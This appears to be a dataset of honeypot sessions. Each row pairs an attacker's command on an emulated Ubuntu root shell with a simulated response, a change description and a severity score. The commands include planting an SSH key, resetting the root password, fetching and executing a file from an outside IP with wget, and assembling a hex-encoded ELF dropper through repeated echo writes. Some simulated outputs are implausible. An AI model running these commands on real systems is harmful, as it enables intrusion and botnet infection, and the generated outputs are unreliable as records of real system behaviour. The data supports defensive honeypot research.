session_id stringclasses 160
values | period stringclasses 1
value | turn_index int64 0 351 | command stringlengths 1 1.77k | response stringlengths 12 6.81k | system_change stringlengths 4 2.61k | severity_vi int64 0 4 | response_source stringclasses 1
value |
|---|---|---|---|---|---|---|---|
06f1ea4882d9 | 2021_2022 | 12 | uname | root@ubuntu:~# uname
Linux
root@ubuntu:~# | No changes to the system. | 0 | curated_ubuntu |
06f1ea4882d9 | 2021_2022 | 13 | uname -a | root@ubuntu:~# uname -a
Linux user 5.4.0-159-generic #176-Ubuntu SMP Wed Oct 13 16:45:01 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
root@ubuntu:~# | No changes to the system. | 0 | curated_ubuntu |
06f1ea4882d9 | 2021_2022 | 14 | lscpu | grep Model | root@ubuntu:~# lscpu | grep Model
Model name: Intel(R) Xeon(R) Silver 4214 CPU @ 2.20GHz
root@ubuntu:~# | No changes to the system. | 0 | curated_ubuntu |
06f1ea4882d9 | 2021_2022 | 15 | cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5... | root@ubuntu:~# cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0... | The '.ssh' directory in the home directory was deleted and recreated. A new SSH public key was added to the 'authorized_keys' file. The permissions of the '.ssh' directory were changed to be accessible only by the owner. | 4 | curated_ubuntu |
9ec94c93430f | 2021_2022 | 0 | cat /proc/cpuinfo | grep name | wc -l | root@ubuntu:~# cat /proc/cpuinfo | grep name | wc -l
24
root@ubuntu:~# | No changes to the system. | 0 | curated_ubuntu |
9ec94c93430f | 2021_2022 | 1 | echo "root:cyeJKMwaBSZ8"|chpasswd|bash | root@ubuntu:~# echo "root:cyeJKMwaBSZ8"|chpasswd|bash
root@ubuntu:~# | The password for the root user has been changed to 'cyeJKMwaBSZ8'. | 4 | curated_ubuntu |
9ec94c93430f | 2021_2022 | 2 | cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' | root@ubuntu:~# cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
Intel(R) Xeon(R) Silver 4214 CPU @ 2.20GHz
root@ubuntu:~# | No changes to the system. | 0 | curated_ubuntu |
9ec94c93430f | 2021_2022 | 3 | free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' | root@ubuntu:~# free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
725938364 123456 234567 345678 456789 567890
root@ubuntu:~# | No changes to the system. | 0 | curated_ubuntu |
fc111e57f254 | 2021_2022 | 0 | >/tmp/.l && cd /tmp/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld | root@ubuntu:~# >/tmp/.l && cd /tmp/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
PATH_DONE
root@ubuntu:/tmp# |
- A new file named '.l' was created in the '/tmp' directory.
- The working directory was changed to '/tmp'.
- The string 'PATH_DONE' was printed to the terminal. | 2 | curated_ubuntu |
fc111e57f254 | 2021_2022 | 1 | >/var/.l && cd /var/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld | root@ubuntu:/tmp# >/var/.l && cd /var/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
PATH_DONE
root@ubuntu:/var# |
- A new file named '.l' was created in the '/var' directory.
- The working directory was changed to '/var'.
- The string 'PATH_DONE' was printed to the terminal. | 2 | curated_ubuntu |
fc111e57f254 | 2021_2022 | 2 | >/dev/.l && cd /dev/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld | root@ubuntu:/var# >/dev/.l && cd /dev/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
PATH_DONE
root@ubuntu:/dev# |
- A new file named '.l' was created in the '/dev' directory.
- The working directory was changed to '/dev'.
- The string 'PATH_DONE' was printed to the terminal. | 2 | curated_ubuntu |
fc111e57f254 | 2021_2022 | 3 | >/mnt/.l && cd /mnt/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld | root@ubuntu:/dev# >/mnt/.l && cd /mnt/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
PATH_DONE
root@ubuntu:/mnt# |
- A new file named '.l' was created in the '/mnt' directory.
- The working directory was changed to '/mnt'.
- The string 'PATH_DONE' was printed to the terminal. | 2 | curated_ubuntu |
8683b60caa6a | 2021_2022 | 0 | enable | root@ubuntu:~# enable
root@ubuntu:~# | ```
root@ubuntu:~# enable
root@ubuntu:~#
```
The 'enable' command was executed, but it doesn't make any changes to the system as it is used to enable and disable builtin shell commands. | 0 | curated_ubuntu |
8683b60caa6a | 2021_2022 | 1 | system | root@ubuntu:~# system
bash: system: command not found
root@ubuntu:~# | ```
root@ubuntu:~# system
bash: system: command not found
root@ubuntu:~#
```
The 'system' command was attempted, but it is not a recognized command in this shell. No changes were made to the system. | 0 | curated_ubuntu |
8683b60caa6a | 2021_2022 | 2 | shell | root@ubuntu:~# shell
bash: shell: command not found
root@ubuntu:~# | ```
root@ubuntu:~# shell
bash: shell: command not found
root@ubuntu:~#
```
The 'shell' command was attempted, but it is not a recognized command in this shell. No changes were made to the system. | 0 | curated_ubuntu |
8683b60caa6a | 2021_2022 | 3 | sh | root@ubuntu:~# sh
# | ```
root@ubuntu:~# sh
#
```
The shell has been changed to 'sh' from 'bash'. | 2 | curated_ubuntu |
8683b60caa6a | 2021_2022 | 4 | cat /proc/mounts; /bin/busybox OCPSW | # cat /proc/mounts
sysfs /sys sysfs rw,nosuid,nodev,noexec,relatime 0 0
proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0
udev /dev devtmpfs rw,nosuid,relatime,size=10240k,nr_inodes=204862,mode=755 0 0
devpts /dev/pts devpts rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000 0 0
tmpfs /run tmpfs rw,nosuid,noexec,r... | ```
# cat /proc/mounts
sysfs /sys sysfs rw,nosuid,nodev,noexec,relatime 0 0
proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0
udev /dev devtmpfs rw,nosuid,relatime,size=10240k,nr_inodes=204862,mode=755 0 0
devpts /dev/pts devpts rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000 0 0
tmpfs /run tmpfs rw,nosuid,noex... | 0 | curated_ubuntu |
8683b60caa6a | 2021_2022 | 5 | cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox OCPSW | # cd /dev/shm
# cat .s || cp /bin/echo .s
date
# /bin/busybox OCPSW
/bin/busybox: applet not found
# | ```
# cd /dev/shm
# cat .s || cp /bin/echo .s
date
# /bin/busybox OCPSW
/bin/busybox: applet not found
#
```
The working directory was changed to '/dev/shm'. The 'cat .s' command was executed, displaying the content of the '.s' file. If the '.s' file did not exist, it would have been created with the content of '/bin/e... | 2 | curated_ubuntu |
8683b60caa6a | 2021_2022 | 6 | tftp; wget; /bin/busybox OCPSW | # tftp
BusyBox v1.30.1 (Ubuntu 1:1.30.1-4ubuntu6.3) multi-call binary.
Usage: tftp [OPTIONS] HOST [PORT]
Transfer a file from/to tftp server
-l FILE Local FILE
-r FILE Remote FILE
-g Get file
-p Put file
# wget
wget: missing URL
Usage: wget [OPTION]... [URL]...
Try `wget --help' for more options.
# /bin/busy... | Try `wget --help' for more options.
# /bin/busybox OCPSW
/bin/busybox: applet not found
#
```
The 'tftp' and 'wget' commands were executed without any arguments, so they displayed their usage instructions. The '/bin/busybox OCPSW' command was attempted, but 'OCPSW' is not a recognized BusyBox applet. | 0 | curated_ubuntu |
8683b60caa6a | 2021_2022 | 7 | dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s | # dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s
1+0 records in
1+0 records out
52 bytes copied, 0.000123 s, 423 kB/s
date
# | ```
# dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s
1+0 records in
1+0 records out
52 bytes copied, 0.000123 s, 423 kB/s
date
#
```
The 'dd' command was executed to read 52 bytes from the '.s' file. If the 'dd' command failed, the 'cat .s' command would have been executed to display the conten... | 0 | curated_ubuntu |
8683b60caa6a | 2021_2022 | 8 | /bin/busybox OCPSW | # /bin/busybox OCPSW
/bin/busybox: applet not found
# | ```
# /bin/busybox OCPSW
/bin/busybox: applet not found
#
```
The '/bin/busybox OCPSW' command was attempted, but 'OCPSW' is not a recognized BusyBox applet. | 0 | curated_ubuntu |
8683b60caa6a | 2021_2022 | 9 | rm .s; wget http://2.225.20.46:40746/.i; chmod 777 .i; ./.i; exit | # rm .s
# wget http://2.225.20.46:40746/.i
--2023-11-30 03:16:35-- http://2.225.20.46:40746/.i
Connecting to 2.225.20.46:40746... connected.
HTTP request sent, awaiting response... 200 OK
Length: 28 [application/x-sh]
Saving to: ‘.i’
100%[======================================>] 28 --.-K/s in 0s
202... | # chmod 777 .i
# ./.i
date
# exit
exit
root@ubuntu:~#
```
The '.s' file in the '/dev/shm' directory was removed. A file named '.i' was downloaded from 'http://2.225.20.46:40746/.i', given full permissions, and executed. The shell was then exited, returning to the previous shell. | 3 | curated_ubuntu |
3c65ece3659a | 2021_2022 | 0 | >/tmp/.l && cd /tmp/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld | root@ubuntu:~# >/tmp/.l && cd /tmp/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
PATH_DONE
root@ubuntu:/tmp# | The working directory was changed to '/tmp'. An empty file named '.l' was created in the '/tmp' directory. The string 'PATH_DONE' was printed to the terminal. | 2 | curated_ubuntu |
3c65ece3659a | 2021_2022 | 1 | >/var/.l && cd /var/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld | root@ubuntu:/tmp# >/var/.l && cd /var/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
PATH_DONE
root@ubuntu:/var# | The working directory was changed to '/var'. An empty file named '.l' was created in the '/var' directory. The string 'PATH_DONE' was printed to the terminal. | 2 | curated_ubuntu |
3c65ece3659a | 2021_2022 | 2 | >/dev/.l && cd /dev/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld | root@ubuntu:/var# >/dev/.l && cd /dev/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
PATH_DONE
root@ubuntu:/dev# | The working directory was changed to '/dev'. An empty file named '.l' was created in the '/dev' directory. The string 'PATH_DONE' was printed to the terminal. | 2 | curated_ubuntu |
3c65ece3659a | 2021_2022 | 3 | >/mnt/.l && cd /mnt/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld | root@ubuntu:/dev# >/mnt/.l && cd /mnt/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
PATH_DONE
root@ubuntu:/mnt# | The working directory was changed to '/mnt'. An empty file named '.l' was created in the '/mnt' directory. The string 'PATH_DONE' was printed to the terminal. | 2 | curated_ubuntu |
3c65ece3659a | 2021_2022 | 4 | >/var/run/.l && cd /var/run/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld | root@ubuntu:/mnt# >/var/run/.l && cd /var/run/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
PATH_DONE
root@ubuntu:/var/run# | The working directory was changed to '/var/run'. An empty file named '.l' was created in the '/var/run' directory. The string 'PATH_DONE' was printed to the terminal. | 2 | curated_ubuntu |
3c65ece3659a | 2021_2022 | 5 | >/var/tmp/.l && cd /var/tmp/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld | root@ubuntu:/var/run# >/var/tmp/.l && cd /var/tmp/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
PATH_DONE
root@ubuntu:/var/tmp# | The working directory was changed to '/var/tmp'. An empty file named '.l' was created in the '/var/tmp' directory. The string 'PATH_DONE' was printed to the terminal. | 2 | curated_ubuntu |
3c65ece3659a | 2021_2022 | 6 | >/.l && cd /; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld | root@ubuntu:/var/tmp# >/.l && cd /; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
PATH_DONE
root@ubuntu:/# | The working directory was changed to '/'. An empty file named '.l' was created in the '/' directory. The string 'PATH_DONE' was printed to the terminal. | 2 | curated_ubuntu |
3c65ece3659a | 2021_2022 | 7 | >/dev/netslink/.l && cd /dev/netslink/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld | root@ubuntu:/# >/dev/netslink/.l && cd /dev/netslink/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
bash: cd: /dev/netslink/: No such file or directory
PATH_DONE
root@ubuntu:/# | An attempt was made to change the working directory to '/dev/netslink' and create an empty file named '.l' in the '/dev/netslink' directory. However, the '/dev/netslink' directory does not exist, so the operations failed. The string 'PATH_DONE' was printed to the terminal. | 2 | curated_ubuntu |
3c65ece3659a | 2021_2022 | 8 | >/dev/shm/.l && cd /dev/shm/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld | root@ubuntu:/# >/dev/shm/.l && cd /dev/shm/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
PATH_DONE
root@ubuntu:/dev/shm# | The working directory was changed to '/dev/shm'. An empty file named '.l' was created in the '/dev/shm' directory. The string 'PATH_DONE' was printed to the terminal. | 2 | curated_ubuntu |
3c65ece3659a | 2021_2022 | 9 | >/bin/.l && cd /bin/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld | root@ubuntu:/dev/shm# >/bin/.l && cd /bin/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
PATH_DONE
root@ubuntu:/bin# | The working directory was changed to '/bin'. An empty file named '.l' was created in the '/bin' directory. The string 'PATH_DONE' was printed to the terminal. | 2 | curated_ubuntu |
3c65ece3659a | 2021_2022 | 10 | >/etc/.l && cd /etc/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld | root@ubuntu:/bin# >/etc/.l && cd /etc/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
PATH_DONE
root@ubuntu:/etc# | The working directory was changed to '/etc'. An empty file named '.l' was created in the '/etc' directory. The string 'PATH_DONE' was printed to the terminal. | 2 | curated_ubuntu |
3c65ece3659a | 2021_2022 | 11 | >/boot/.l && cd /boot/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld | root@ubuntu:/etc# >/boot/.l && cd /boot/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
PATH_DONE
root@ubuntu:/boot# | The working directory was changed to '/boot'. An empty file named '.l' was created in the '/boot' directory. The string 'PATH_DONE' was printed to the terminal. | 2 | curated_ubuntu |
3c65ece3659a | 2021_2022 | 12 | >/usr/.l && cd /usr/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld | root@ubuntu:/boot# >/usr/.l && cd /usr/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
PATH_DONE
root@ubuntu:/usr# | The working directory was changed to '/usr'. An empty file named '.l' was created in the '/usr' directory. The string 'PATH_DONE' was printed to the terminal. | 2 | curated_ubuntu |
3c65ece3659a | 2021_2022 | 13 | >/sys/.l && cd /sys/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld | root@ubuntu:/usr# >/sys/.l && cd /sys/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
PATH_DONE
root@ubuntu:/sys# | The working directory was changed to '/sys'. An empty file named '.l' was created in the '/sys' directory. The string 'PATH_DONE' was printed to the terminal. | 2 | curated_ubuntu |
3c65ece3659a | 2021_2022 | 14 | rm -rf ddnsclient;rm -rf ntpclient; cp /bin/echo ddnsclient; >ddnsclient; cp ddnsclient ntpclient; chmod 777 ddnsclient; chmod 777 ntpclient | root@ubuntu:/sys# rm -rf ddnsclient;rm -rf ntpclient; cp /bin/echo ddnsclient; >ddnsclient; cp ddnsclient ntpclient; chmod 777 ddnsclient; chmod 777 ntpclient
root@ubuntu:/sys# |
- The files 'ddnsclient' and 'ntpclient' in the '/sys' directory were removed.
- The 'echo' command was copied to a new file named 'ddnsclient'.
- The 'ddnsclient' file was emptied.
- The 'ddnsclient' file was copied to a new file named 'ntpclient'.
- The 'ddnsclient' and 'ntpclient' files were given full permissions. | 4 | curated_ubuntu |
3c65ece3659a | 2021_2022 | 15 | echo -ne '\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x03\x00\x01\x00\x00\x00\xd7\x82\x04\x08\x34\x00\x00\x00\x1c\x04\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x03\x00\x28\x00\x05\x00\x04\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80\x04\x08\x00\x80\x04\x08\xfe\x03\x00\x00\xfe\x03\x00\x00\x05\x... | root@ubuntu:/sys# echo -ne '\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x03\x00\x01\x00\x00\x00\xd7\x82\x04\x08\x34\x00\x00\x00\x1c\x04\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x03\x00\x28\x00\x05\x00\x04\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80\x04\x08\x00\x80\x04\x08\xfe\x03\x00\x00\xfe... |
- The 'ddnsclient' file in the '/sys' directory was overwritten with a new binary content.
- The string 'ECHODONE' was printed to the terminal. | 4 | curated_ubuntu |
3c65ece3659a | 2021_2022 | 16 | echo -ne '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x55\x89\xe5\x0f\xb6\x4d\x0c\x0f\xb6\x45\x14\xc1\xe1\x10\x09\xc1\x0f\xb6\x45\x08\xc1\xe0\x18\x09\xc1\x0f\xb6\x45\x10\x5d\xc1\xe0\x08\x09\xc1\x89\xca\xc1\xe2\x18\xc1\xe0\x08\x09\xd0\x... | root@ubuntu:/sys# echo -ne '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x55\x89\xe5\x0f\xb6\x4d\x0c\x0f\xb6\x45\x14\xc1\xe1\x10\x09\xc1\x0f\xb6\x45\x08\xc1\xe0\x18\x09\xc1\x0f\xb6\x45\x10\x5d\xc1\xe0\x08\x09\xc1\x89\xca\xc1\xe2\x18\xc1... |
- The 'ddnsclient' file in the '/sys' directory was appended with new binary content.
- The string 'ECHODONE' was printed to the terminal. | 4 | curated_ubuntu |
3c65ece3659a | 2021_2022 | 17 | echo -ne '\xe8\xdb\x01\x00\x00\xc9\xc3\x55\x89\xe5\x83\xec\x08\xff\x75\x10\xff\x75\x0c\xff\x75\x08\x6a\x05\xe8\xc3\x01\x00\x00\xc9\xc3\x55\x89\xe5\x83\xec\x1c\x8b\x45\x08\x89\x45\xf4\x8b\x45\x0c\x89\x45\xf8\x8b\x45\x10\x89\x45\xfc\x8d\x45\xf4\x50\x6a\x03\x6a\x66\xe8\x9c\x01\x00\x00\xc9\xc3\x55\x89\xe5\x83\xec\x08\xff\x... | root@ubuntu:/sys# echo -ne '\xe8\xdb\x01\x00\x00\xc9\xc3\x55\x89\xe5\x83\xec\x08\xff\x75\x10\xff\x75\x0c\xff\x75\x08\x6a\x05\xe8\xc3\x01\x00\x00\xc9\xc3\x55\x89\xe5\x83\xec\x1c\x8b\x45\x08\x89\x45\xf4\x8b\x45\x0c\x89\x45\xf8\x8b\x45\x10\x89\x45\xfc\x8d\x45\xf4\x50\x6a\x03\x6a\x66\xe8\x9c\x01\x00\x00\xc9\xc3\x55\x89\xe5... |
- The 'ddnsclient' file in the '/sys' directory was appended with new binary content.
- The string 'ECHODONE' was printed to the terminal. | 4 | curated_ubuntu |
3c65ece3659a | 2021_2022 | 18 | echo -ne '\x45\xf4\x8b\x45\x0c\x89\x45\xf8\x8b\x45\x10\x89\x45\xfc\x8d\x45\xf4\x50\x6a\x01\x6a\x66\xe8\x45\x01\x00\x00\xc9\xc3\x55\xba\xd2\x83\x04\x08\x89\xe5\x57\x56\x53\x31\xdb\x81\xec\xac\x00\x00\x00\xeb\x01\x43\x8a\x02\x42\x84\xc0\x75\xf8\x68\xf4\x00\x00\x00\x6a\x62\x6a\x1f\x68\xc2\x00\x00\x00\x66\xc7\x45\xe0\x02\x... | root@ubuntu:/sys# echo -ne '\x45\xf4\x8b\x45\x0c\x89\x45\xf8\x8b\x45\x10\x89\x45\xfc\x8d\x45\xf4\x50\x6a\x01\x6a\x66\xe8\x45\x01\x00\x00\xc9\xc3\x55\xba\xd2\x83\x04\x08\x89\xe5\x57\x56\x53\x31\xdb\x81\xec\xac\x00\x00\x00\xeb\x01\x43\x8a\x02\x42\x84\xc0\x75\xf8\x68\xf4\x00\x00\x00\x6a\x62\x6a\x1f\x68\xc2\x00\x00\x00\x66... |
- The 'ddnsclient' file in the '/sys' directory was appended with new binary content.
- The string 'ECHODONE' was printed to the terminal. | 4 | curated_ubuntu |
3c65ece3659a | 2021_2022 | 19 | echo -ne '\xff\xff\xff\x83\xc4\x10\x83\xf8\xff\x89\xc6\x74\x05\x83\xff\xff\x75\x0d\x83\xec\x0c\x6a\x01\xe8\xc4\xfe\xff\xff\x83\xc4\x10\x50\x6a\x10\x8d\x45\xe0\x50\x56\xe8\xf3\xfe\xff\xff\x83\xc4\x10\x85\xc0\x79\x0e\x83\xec\x0c\xf7\xd8\x50\xe8\xa2\xfe\xff\xff\x83\xc4\x10\x50\x8d\x43\x1a\x31\xdb\x50\x68\xe0\x83\x04\x08\x... | root@ubuntu:/sys# echo -ne '\xff\xff\xff\x83\xc4\x10\x83\xf8\xff\x89\xc6\x74\x05\x83\xff\xff\x75\x0d\x83\xec\x0c\x6a\x01\xe8\xc4\xfe\xff\xff\x83\xc4\x10\x50\x6a\x10\x8d\x45\xe0\x50\x56\xe8\xf3\xfe\xff\xff\x83\xc4\x10\x85\xc0\x79\x0e\x83\xec\x0c\xf7\xd8\x50\xe8\xa2\xfe\xff\xff\x83\xc4\x10\x50\x8d\x43\x1a\x31\xdb\x50\x68... |
- The 'ddnsclient' file in the '/sys' directory was appended with new binary content.
- The string 'ECHODONE' was printed to the terminal. | 4 | curated_ubuntu |
3c65ece3659a | 2021_2022 | 20 | echo -ne '\xfb\x0a\x0d\x0a\x0d\x75\xcf\x8d\x9d\x60\xff\xff\xff\x51\x68\x80\x00\x00\x00\x53\x56\xe8\xc4\xfe\xff\xff\x83\xc4\x10\x85\xc0\x7e\x0e\x52\x50\x53\x57\xe8\x9c\xfe\xff\xff\x83\xc4\x10\xeb\xde\x83\xec\x0c\x56\xe8\x3d\xfe\xff\xff\x89\x3c\x24\xe8\x35\xfe\xff\xff\xc7\x04\x24\x05\x00\x00\x00\xe8\x14\xfe\xff\xff\x83\x... | root@ubuntu:/sys# echo -ne '\xfb\x0a\x0d\x0a\x0d\x75\xcf\x8d\x9d\x60\xff\xff\xff\x51\x68\x80\x00\x00\x00\x53\x56\xe8\xc4\xfe\xff\xff\x83\xc4\x10\x85\xc0\x7e\x0e\x52\x50\x53\x57\xe8\x9c\xfe\xff\xff\x83\xc4\x10\xeb\xde\x83\xec\x0c\x56\xe8\x3d\xfe\xff\xff\x89\x3c\x24\xe8\x35\xfe\xff\xff\xc7\x04\x24\x05\x00\x00\x00\xe8\x14... |
- The 'ddnsclient' file in the '/sys' directory was appended with new binary content.
- The string 'ECHODONE' was printed to the terminal. | 4 | curated_ubuntu |
3c65ece3659a | 2021_2022 | 21 | echo -ne '\x24\x2c\x8b\x74\x24\x30\x89\x44\x24\x04\x8b\x44\x24\x38\x89\x44\x24\x08\x8b\x44\x24\x20\x53\xe8\x45\x00\x00\x00\x83\xc4\x04\x83\xec\x0c\x50\xe8\x78\x00\x00\x00\x83\xc4\x20\x5b\x5e\x5f\xc3\x90\x57\x53\x89\xd3\x89\xfa\x8b\x7c\x24\x0c\x50\xe8\x06\x00\x00\x00\x89\xda\x5b\x5b\x5f\xc3\x8b\x04\x24\x05\x14\x11\x00\x... | root@ubuntu:/sys# echo -ne '\x8d\x44\x24\x18\x56' >> ddnsclient; echo -e '\x45\x43\x48\x4f\x44\x4f\x4e\x45'
ECHODONE
root@ubuntu:/sys# |
- The 'ddnsclient' file in the '/sys' directory was appended with new binary content.
- The string 'ECHODONE' was printed to the terminal. | 4 | curated_ubuntu |
3c65ece3659a | 2021_2022 | 22 | echo -ne '\x57\x50\x8b\x44\x24\x10\x8b\x54\x24\x14\x8b\x4c\x24\x18\x8b\x7c\x24\x1c\x8b\x74\x24\x20\xe8\xc6\xff\xff\xff\x5f\x5f\x5e\xc3\x90\x53\x83\xec\x08\x8b\x5c\x24\x10\x81\xfb\x00\xf0\xff\xff\x89\xd8\x77\x05\x83\xc4\x08\x5b\xc3\xe8\x0c\x00\x00\x00\xf7\xdb\x89\x18\xb8\xff\xff\xff\xff\xeb\xeb\x90\x65\xa1\x00\x00\x00\x... | root@ubuntu:/sys# echo -ne '\x57\x50\x8b\x44\x24\x10\x8b\x54\x24\x14\x8b\x4c\x24\x18\x8b\x7c\x24\x1c\x8b\x74\x24\x20\xe8\xc6\xff\xff\xff\x5f\x5f\x5e\xc3\x90\x53\x83\xec\x08\x8b\x5c\x24\x10\x81\xfb\x00\xf0\xff\xff\x89\xd8\x77\x05\x83\xc4\x08\x5b\xc3\xe8\x0c\x00\x00\x00\xf7\xdb\x89\x18\xb8\xff\xff\xff\xff\xeb\xeb\x90\x65... |
- The 'ddnsclient' file in the '/sys' directory was appended with new binary content.
- The string 'ECHODONE' was printed to the terminal. | 4 | curated_ubuntu |
3c65ece3659a | 2021_2022 | 23 | echo -ne '\x73\x68\x73\x74\x72\x74\x61\x62\x00\x2e\x74\x65\x78\x74\x00\x2e\x72\x6f\x64\x61\x74\x61\x00\x2e\x62\x73\x73\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x01\x00\x00\x00\x06\x... | root@ubuntu:/sys# echo -ne '\x73\x68\x73\x74\x72\x74\x61\x62\x00\x2e\x74\x65\x78\x74\x00\x2e\x72\x6f\x64\x61\x74\x61\x00\x2e\x62\x73\x73\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x01\x00\x00... |
- The 'ddnsclient' file in the '/sys' directory was appended with new binary content.
- The string 'ECHODONE' was printed to the terminal. | 4 | curated_ubuntu |
3c65ece3659a | 2021_2022 | 24 | echo -ne '\x2c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x19\x00\x00\x00\x08\x00\x00\x00\x03\x00\x00\x00\x00\x94\x04\x08\x00\x04\x00\x00\x58\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfe\x... | root@ubuntu:/sys# echo -ne '\x2c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x19\x00\x00\x00\x08\x00\x00\x00\x03\x00\x00\x00\x00\x94\x04\x08\x00\x04\x00\x00\x58\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00... |
- The 'ddnsclient' file in the '/sys' directory was appended with new binary content.
- The string 'ECHODONE' was printed to the terminal. | 4 | curated_ubuntu |
